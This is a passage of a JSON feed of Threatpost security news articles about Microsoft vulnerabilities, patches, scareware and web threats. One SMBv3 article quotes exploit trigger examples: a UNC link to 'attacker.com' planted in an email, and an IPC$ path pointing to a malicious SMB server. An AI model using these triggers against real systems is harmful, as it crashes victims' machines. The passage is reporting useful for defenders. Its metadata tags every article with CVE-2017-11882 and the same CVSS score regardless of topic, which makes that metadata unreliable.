Microsoft.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_410.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [Curious Hands](<http://podsafeaudio.com/jamroom/bands/1309/>).\n", "cvss3": {}, "published": "2009-04-07T13:43:08", "type": "threatpost", "title": "Adam Shostack on the Science of Security and Value of Thinking Differently", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:25:28", "id": "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "href": "https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&amp;if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. \u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force a Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET to do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "**[](<https://threatpost.com/microsoft-revokes-trust-28-its-own-certificates-071012/>)UPDATED**\u2013In the wake of the [Flame malware](<https://threatpost.com/what-have-we-learned-flame-malware-061512/>) attack, which involved the use of a fraudulent Microsoft digital certificate, the software giant has reviewed its certificates and found nearly 30 that aren\u2019t as secure as the company would like and has revoked them. Microsoft also released its new updater for certificates as a critical update for Windows Vista and later versions as part of today\u2019s July Patch Tuesday.\n\nMicrosoft has not said exactly what the now-untrusted certificates were used for, but company officials said there were a total of 28 certificates affected by the move. Many of the [affected certificates](<http://technet.microsoft.com/en-us/security/advisory/2728973>) are listed simply as \u201cMicrosoft Online Svcs\u201d. However, the company said that it was confident that none of them had been compromised or used maliciously. The move to revoke trust in these certificates is a direct result of the investigation into the Flame malware and how the attackers were able to forge a Microsoft certificate and then use it to impersonate a Windows Update server.\n\n\u201cAs a continuation of this effort, we reviewed a number of Microsoft digital certificates and found several which do not meet our standards for security practices. As an extra precautionary measure, we released [Security Advisory 2728973](<http://cmstechnet.redmond.corp.microsoft.com/en-us/security/advisory/2728973>) today to announce the availability of a Critical, non-security update that moves several of these certificates into the Untrusted Certificate Store. None of the certificates involved are known to have been breached, compromised, or otherwise misused. This is a pre-emptive cleanup to ensure a high bar for any certificates owned by Microsoft,\u201d Gerardo Di Giacomo and Jonathan Ness of the Microsoft Security Response Center wrote in an explanation of the change.\n\nDuring the analysis of the Flame malware, researchers discovered that one of the unique features of the worm was its use of a [forged Microsoft certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>). The attackers used that certificate to set up a seemingly valid Windows Update server inside an infected organization and then have clients connect to the server, ostensibly for Microsoft updates, and then install the Flame malware on those machines.\n\nThat episode led to several changes in the way that Microsoft handles certificates, and the revocation of trust in several of its own certificates is one of the more dramatic results. Several weeks ago the company also announced that it would be releasing a mechanism for Windows that would automatically update the status of certificates in the certificate store. That was released as an optional update for Windows, but today Microsoft changed that to a critical, non-security update, which will install it automatically on many machines.\n\n\u201cThis new feature provides dynamic updates, allowing Windows clients to be updated with untrusted certificates once per day without requiring user interaction,\u201d Di Giacomo and Ness wrote.\n\n_This story was updated on July 10 to add the number of certificates marked as untrusted._\n", "cvss3": {}, "published": "2012-07-10T18:30:16", "type": "threatpost", "title": "Microsoft Revokes Trust in 28 of Its Own Certificates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:53", "id": "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "href": "https://threatpost.com/microsoft-revokes-trust-28-its-own-certificates-071012/76784/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:31", "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows user to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for \npublishing of Tracking Protection Lists (TPLs), and the underlying \ntechnology mechanism for Tracking Protection offer new options and a \ngood balance between empowering consumers and online industry needs. \nThey further empower consumers and complement many of the other ideas \nunder discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). \nUntil we get there, we can make progress by providing consumers with a \nway to limit or control the data collected about them on sites they \ndon\u2019t visit directly. That kind of control is already technically \nfeasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). \nIt is important to understand that the feature design makes no judgment \nabout how information might be used. Rather, it provides the means for \nconsumers to opt-out of the release of that information in the first \nplace.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. \n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information \nrequests to some web addresses, lists can include \u2018OK to Call\u2019 entries \nthat permit calls to specific addresses. In this way, a consumer can \nmake exceptions to restrictions on one list easily by adding another \nlist that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe \ndesigned this feature so that consumers have a clear, straight forward, \nopt-in mechanism to enable a higher degree of control over sharing \ntheir browsing information AND websites can provide easy to use lists to \nmanage their privacy as well as experience full-featured sites.\u201d\n", "cvss3": {}, "published": "2010-12-07T20:00:18", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:34", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:15", "description": "[](<https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/>)We\u2019ve noted for a while that the \npractices of rogue antivirus software have started to mimic those of \nlegitimate antivirus software vendors. But a new version of FakeXPA scareware take things a bit further: posing as a legitimate commercial AV package, AVG Antivirus 2011. \n\nMicrosoft\u2019s Malware Protection Center [issued a warning for the phony AVG program on Monday](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=AVGAntivirus2011>), noting that the application is standard issue scareware that claims to scan for malware, displays fake \u2018detection\u2019 warnings about infections, then asks for money to remove the non-existent malware. Like other scareware, FakeXPA is known, in cases, to install its own malware \u2013 variants of the Alureon Trojan horse program.\n\nScreen shots of the FakeXPA malware \nshows a legitimate seeming GUI with the AVG Anti Virus logo prominently \ndisplayed. AVG Antivirus 2011 is one of many names used by the malware, with small variations in branding and user interface distinguishing each.\n\nRogue \nanti virus has blossomed into a multi million dollar business in the \nlast decade using aggressive promotion techniques like search engine \noptimization and web-based pop-up ads to trick unwitting Web surfers \ninto downloading their scareware.\n\n \n\n\nCoopting a legitimate product\u2019s name and logo are just the latest in a series of steps by rogue anti malware vendors to mirror the features and actions of legitimate anti virus software makers. In addition, fake AV firms have also introduced services like localization, [online customer support](<https://threatpost.com/pulling-back-curtain-rogue-av-tech-support-071210/>) (with real humans!) and even [AV-Test like product benchmarking](<https://threatpost.com/rise-rogue-av-testers-070910/>) to serve their \u201ccustomers\u201d and increase profits. \n", "cvss3": {}, "published": "2011-02-01T20:37:43", "type": "threatpost", "title": "Fake AVG: Scam Software Cops Name and Logo of Real AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:15", "id": "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "href": "https://threatpost.com/fake-avg-scam-software-cops-name-and-logo-real-av-020111/74899/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and Jscript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting enginer memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. \u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "cvss3": {}, "published": "2015-10-13T14:39:57", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-14T20:03:27", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:56", "description": "Microsoft is ready to officially declare network worms pass\u00e9 for the enterprise. In its latest [Security Intelligence Report](<http://www.microsoft.com/security/sir/default.aspx>), released Wednesday, Microsoft said that risks posed by Web-based threats to large, distributed network environments have surpassed malware such as Conficker.\n\nThe report is based on data collected from more than one billion endpoints in more than 100 countries by the company\u2019s Malicious Software Removal Tool, Hotmail accounts and Windows Defender users, said Holly Stewart, senior program manager for Microsoft\u2019s Malware Protection Center.\n\nFor years, Microsoft has considered Conficker the benchmark of network-based malware. The worm first popped up in 2008 and paved the way for other credential-stealing malware. Now that\u2019s changed, Stewart said.\n\n\u201cConficker has been thought of as the sentinel of infiltration,\u201d Stewart said. \u201cIt has not changed in years. It spreads using an old vulnerability. It steals passwords and uses USB drives and shared drives to move on the network. It\u2019s been tracked as a beacon of things within the network when things are not quite right.\u201d\n\n[Conficker](<http://threatpost.com/en_us/blogs/conficker-working-group-efforts-fight-botnet-mixed-bag-012511>) is more of a chameleon, constantly changing propagation methods and malware techniques. The worm emerged in November 2008 and attacked a Windows vulnerability to steal passwords and build one of the more formidable botnets ever recorded, reaching a peak of 12 million bots in 2009 according to some estimates. But as enterprises in particular shore up their security efforts, [Conficker infections](<https://threatpost.com/en_us/blogs/conficker-worm-continues-evolve-confound-researchers-032009>) are dwindling noticeably, Microsoft said. The drop coincides with a number of factors, including increased password vigilance and a policy decision by Microsoft to disable its Autorun functionality by default starting with Windows XP and Vista in 2011.\n\n\u201cConficker started to decline in Q2 2011. If you look at two other worms, Autorun and Rimecud, both used the same propagation method and both had serious declines (37 percent and 69 percent respectively),\u201d Stewart said. \u201cCertainly there\u2019s a correlation of the amount of threats we saw in the enterprise; it seems to indicate the decision had some impact.\u201d\n\n[Autorun malware](<http://threatpost.com/en_us/blogs/infections-will-not-die-conficker-and-autorun-011712>) spreads via removable media and generally drops backdoors that enable additional malware infections such as keyloggers that steal credentials and other personal data. Rimecud is similar malware in that it propagates via USB drives and instant messenger applications. Its\n\npayload includes backdoor connections to remote servers and additional malware is installed from third-party servers and peer-to-peer networks.\n\nNaturally, however, enterprises aren\u2019t out of the woods now that network worms have tailed off. Web-based threats have been a growing threat for years as hackers exploit common input-validation vulnerabilities with automated SQL injection attacks or cross-site scripting attacks that enable them to remotely control vulnerable browsers. Users are redirected to sites hosting malicious content and are infected with more malware, or are lured to an attacker-controlled site via social engineering (phishing, spam, typo-squatting) and tricked into entering legitimate credentials. The result has been a spike in Web-based attacks, in particular iFrame Redirects.\n\nThe Microsoft SIR said that seven of the top 10 threats it detects involves some sort of malicious website or compromised Web content, and two of those seven are iFrame-redirection attacks. Stewart said 3.3 million iFrame redirections were detected, a five-fold increase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07052206/SIR2013.jpg>)\n\n\u201cIt\u2019s a really big shift in what we\u2019re seeing as top threats for the enterprise,\u201d Stewart said. \u201cMalicious iFrame redirection is a middle man in these Web-based attacks; it\u2019s that little component where the user is exposed to malicious content.\u201d\n\nHackers have been able to automate scans for sites vulnerable to attacks such as SQL injection. A targeted Google search, for example, will render a detailed and sizeable list of Web servers vulnerable to any number of attacks. IFrame attacks are effective because the code is not obvious to the user or even the Web administrator for example, because the attacker isn\u2019t adding a page to the vulnerable server, defacing a page or adding\n\nmalware, just a redirector, Stewart said.\n\n\u201cThe iFrame exposes visitors to bad stuff that the attacker is hosting somewhere else,\u201d Stewart said. \u201cIt\u2019s a piece in the chain of a Web-based delivery system.\u201d\n\nIFrame attacks are not alone. Other threats such as Zbot, or the Zeus Trojan, the Blacole Trojan and keygen programs that generate product keys used to validate pirated software climbed the charts, Microsoft said.\n\n\u201cEnterprise customers are much more exposed than ever to malicious Web content,\u201d Stewart said.\n", "cvss3": {}, "published": "2013-04-18T11:11:17", "type": "threatpost", "title": "Move Over Conficker, Web Threats are Top Enterprise Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-22T20:47:19", "id": "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "href": "https://threatpost.com/move-over-conficker-web-threats-are-top-enterprise-risk/99762/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "On the Microsoft Secure Windows Iniative blog, software engineer Chengyun discusses the default behaviour of ActiveX controls embedded in Office documents. The software giant also provides information on how can an attacker abuse ActiveX and how Office users can change the behavior of ActiveX controls embedded in Office documents.\n\nFrom [the article](<http://blogs.technet.com/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx>):\n\nAttackers have discovered ActiveX support in Office applications and have been using it to more effectively lure victims to web-based malware. They have recently used the \u201cMicrosoft Scriptlet Component\u201d to navigate victims to a website exploiting a patched Internet Explorer vulnerability (CVE 2009-0075, fixed by [security bulletin MS09-002](<http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx>)). Seems like attackers have discovered it is easier to trick a user to open a Word document attached to email compared to luring a user to click a dubious-looking link.\n\nChengyun also provides step-by-step instructions on configuring Office 2007 for users concerned about Safe-for-Initialization ActiveX controls being instantiated by Office without prompt.\n\nFor more on this type of attack, [check this entry](<http://blog.trendmicro.com/another-exploit-targets-ie7-bug/>) at Trend Micro\u2019s malware blog.\n", "cvss3": {}, "published": "2009-03-04T14:51:09", "type": "threatpost", "title": "Microsoft explains how ActiveX in Office is abused by attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:38", "id": "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "href": "https://threatpost.com/microsoft-explains-how-activex-office-abused-attackers-030409/72366/", "cvss": {"score": 